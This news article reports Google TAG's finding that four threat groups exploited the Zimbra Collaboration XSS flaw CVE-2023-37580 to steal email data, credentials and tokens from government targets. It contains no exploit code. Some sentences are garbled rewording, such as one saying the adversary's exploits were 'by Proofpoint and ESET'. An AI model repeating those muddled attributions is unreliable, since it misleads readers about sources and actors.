A zero-day flaw in the Zimbra Collaboration email software was exploited by four different groups in real-world attacks to obtain email data, user credentials, and authentication tokens.
“Most of this activity happened after the first fix became public on GitHub,” Google Threat Analysis Group (TAG) SAYS in a report shared by The Hacker News.
The error, tracked as CVE-2023-37580 (CVSS score: 6.1), a demonstrated cross-site scripting (XSS) vulnerability affecting versions prior to 8.8.15 Patch 41. Zimbra addressed it as part of patches released on July 25, 2023.
Successful exploitation of the flaws could allow the execution of malicious scripts in victims’ web browsers simply by tricking them into clicking on a specially crafted URL, effectively launching an XSS request on Zimbra and shows the attack back to the user.
Google TAG, whose researcher Clément Lecigne is credited with discovering and reporting the bug, says it discovered multiple campaign waves starting June 29, 2023, at least two weeks before Zimbra issued an advisory.
Three of the four campaigns were observed before the release of the patch, with the fourth campaign detected a month after the fixes were published.
The first campaign allegedly targeted a Greek government organization, sending emails containing exploit URLs to their targets that, when clicked, delivered an email stealing malware that had previously been observed in a cyber espionage operation called EmailThief in February 2022.
The intrusion set, which Volexity codenamed TEMP_HERETIC, also exploited a zero-day flaw in Zimbra to carry out the attacks.
The second threat actor to exploit CVE-2023-37580 was Winter Vivern, which targeted government organizations in Moldova and Tunisia shortly after a patch for the vulnerability was pushed to GitHub on July 5.
It is worth noting that the collective adversary has been involved in exploiting security vulnerabilities in Zimbra Collaboration and Roundcube by Proofpoint and ESET this year.
TAG said it found a third, unknown group that weaponized the bug before the patch was pushed out on July 25 to phish for credentials belonging to a Vietnamese government organization.
“In this case, the exploited URL points to a script that displays a phishing page for users’ webmail credentials and posts the stolen credentials to a URL hosted by a official government domains that the attackers likely compromised,” TAG said.
Finally, a Pakistani government organization was targeted using the flaw on August 25, which resulted in the exfiltration of Zimbra authentication tokens to a remote domain named “ntcpk(.)org.”
Google also points to a pattern in which threat actors often exploit XSS vulnerabilities in mail servers, requiring that such applications be thoroughly audited.
“The discovery of at least four campaigns exploiting CVE-2023-37580, three campaigns after the bug first became public, shows the importance of organizations applying fixes to their emails server as soon as possible,” TAG said.
“These campaigns also highlight how attackers monitor open source repositories to exploit vulnerabilities where fixes are in the repository, but not yet released to users.”